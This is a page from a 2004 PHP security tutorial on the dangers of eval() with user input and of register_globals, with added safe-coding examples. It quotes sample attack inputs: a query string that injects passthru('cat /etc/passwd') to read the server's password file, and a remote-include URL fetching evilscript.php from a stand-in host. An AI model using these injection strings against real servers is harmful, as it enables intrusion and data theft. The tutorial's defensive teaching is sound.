PHP Security Mistakes
By: Dave Clark
    2004-06-09

    Table of Contents:
  • PHP Security Mistakes
  • Tips 2, 3
  • Tip 4
  • Tips 5, 6


    PHP Security Mistakes - Tips 2, 3


    (Page 2 of 4 )

    2. Be careful with eval()

    Placing user-supplied values into the eval() function can be extremely dangerous. You essentially give the malicious user the ability to execute any command he or she wishes! You may envision the input coming from a drop-down menu of options you specify, but your user may decide to send input like this:

    script.php?input=;passthru("cat /etc/passwd");

    By putting his own code into that statement, the user could cause your program to output your server's complete /etc/passwd file.

    Use eval() sparingly, and by all means validate the input. It should only be used when absolutely necessary, that is, when you genuinely have to run dynamically generated PHP code. If you are using it to substitute template variables into a string or to substitute user-supplied values, then you are using it for the wrong reason. Try sprintf() or a template system instead.
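    As an added example (not code from the original article), here is the eval() pattern the text warns about next to the two replacements it recommends: validating the input against the fixed set of options a drop-down would offer, and doing template substitution with strtr()/sprintf() so values are treated as data rather than parsed as PHP. The function names, the colour list and the sample inputs are all constructed for this demonstration.

```php
<?php
// Added example, not code from the article. Names and sample inputs below
// are constructed for the demonstration.

// The pattern from the text: user input is spliced into source code that
// eval() compiles and runs. Whatever string arrives in $input becomes PHP.
function pick_colour_unsafe($input)
{
    eval('$colour = ' . $input . ';');   // never do this with untrusted data
    return $colour;
}

// Fix 1: the input is really a choice among values you already know, so
// compare it against that list (strict comparison) and never call eval().
function pick_colour_safe($input, array $allowed, $default)
{
    if (!in_array($input, $allowed, true)) {
        return $default;                  // or reject the request outright
    }
    return $input;
}

// Fix 2: template substitution without eval(). Placeholders are replaced
// with escaped values by strtr(); the template is never executed.
function render($template, array $vars)
{
    $map = array();
    foreach ($vars as $name => $value) {
        $map['{' . $name . '}'] = htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
    }
    return strtr($template, $map);
}

$allowed = array('red', 'green', 'blue');

// Constructed inputs standing in for $_GET['input']: one a value the
// drop-down would send, the other the kind of string the text describes.
$benign  = 'green';
$hostile = ';passthru("cat /etc/passwd");';

// Only the safe path is exercised; pick_colour_unsafe() is kept above purely
// for comparison and is never called.
$colour = pick_colour_safe($benign, $allowed, 'blue');
echo render("Colour: {colour}\n", array('colour' => $colour));

$colour = pick_colour_safe($hostile, $allowed, 'blue');
echo render("Colour: {colour}\n", array('colour' => $colour));

// sprintf() covers the simple "insert a value into a message" case too.
echo sprintf("You chose %s out of %d options.\n",
             htmlspecialchars($colour, ENT_QUOTES, 'UTF-8'), count($allowed));
```

    Run from the command line the script prints the benign choice, then the default for the rejected value; at no point does the request string reach anything that compiles PHP. The point of in_array() with its third argument set to true is that the comparison is strict, so values that merely look numeric or empty cannot slip past the check.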

    3. Be careful when using register_globals = ON

    This has been a major issue since this feature was invented. It was originally designed to make programming in PHP easier (and that it did), but misuse of it often led to security holes. As of PHP 4.2.0, register_globals is set to OFF by default. It is recommended that you use the superglobals to deal with input ($_GET, $_POST, $_COOKIE, $_SESSION, etc).

    For example, let us say that you had a variable that specified what page to include:

    include($page);

    but you intended $page to be defined in a config file or somewhere else in the script, and not to come from user input. Suppose that in one code path you forgot to pre-define $page. If register_globals is set to ON, the malicious user can take over and define $page for you, by calling your script like this:

    script.php?page=http://www.example.com/evilscript.php

    I recommend you develop with register_globals set to OFF, and use the superglobals when accessing user input. In addition, you should always develop with full error reporting, which can be specified like this (at the top of your script):

    error_reporting(E_ALL);

    This way, you will receive a notice for every variable you reference that was not previously defined. PHP does not require you to declare variables, so some of these notices can be ignored, but they will help you catch undefined variables that you expected to come from input or other sources. In the previous example, when $page was referenced in the include() statement, PHP would issue a notice that $page was not defined.

    Whether or not you want to use register_globals is up to you, but make sure you are aware of the advantages and disadvantages of it and how to remedy the possible security holes.
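    As an added example (not code from the original article), here is the include($page) case from the text rewritten so that it does not depend on register_globals at all: the page is read explicitly from $_GET, mapped through a fixed list of files you control, and checked against the directory it must live in before being included. The page map, the pages/ directory and the resolve_page() helper are constructed for this demonstration; the script expects a pages/ directory with the listed files beside it.

```php
<?php
// Added example, not code from the article. The page map, file names and
// helper below are constructed for the demonstration.

error_reporting(E_ALL);          // from the text: notices for undefined variables
ini_set('display_errors', '1');  // useful while developing; keep it off in production

// Never derive the file to include from raw input. A short key that is
// looked up in this array is the only thing the request can influence.
$pages = array(
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
);

// Returns the relative path for a requested key, or the default page when
// the key is missing or unknown. Unknown keys include URLs, "../" sequences
// and anything else that is not an exact array key.
function resolve_page(array $pages, $requested, $default)
{
    if ($requested === null || $requested === '') {
        return $pages[$default];
    }
    if (!array_key_exists($requested, $pages)) {
        return $pages[$default];
    }
    return $pages[$requested];
}

// Read explicitly from the superglobal instead of relying on a global $page.
// isset() keeps this free of the very notice the text describes.
$requested = isset($_GET['page']) ? (string) $_GET['page'] : null;
$file = resolve_page($pages, $requested, 'home');

// Defence in depth: even if the map above were edited carelessly, refuse to
// include anything that does not resolve to a file inside pages/.
$base = realpath(__DIR__ . '/pages');
$real = realpath(__DIR__ . '/' . $file);
if ($base === false || $real === false
    || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
    header('HTTP/1.0 404 Not Found');
    exit('Page not found');
}

include $real;
```

    Two caveats worth knowing when reading this alongside the article: register_globals was deprecated in PHP 5.3 and removed in PHP 5.4, so on current versions the setting no longer exists, and on the old versions where it does you can confirm its state with ini_get('register_globals'). The remote include in the article's example additionally depends on the server allowing URLs in include(); since PHP 5.2 that is governed by the separate allow_url_include setting, which should stay off. Neither fact changes the advice above: reading input only from the superglobals and mapping it through a fixed list is what closes the hole.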

    © 2003-2008 by Developer Shed. All rights reserved. DS Cluster 4 hosted by Hostway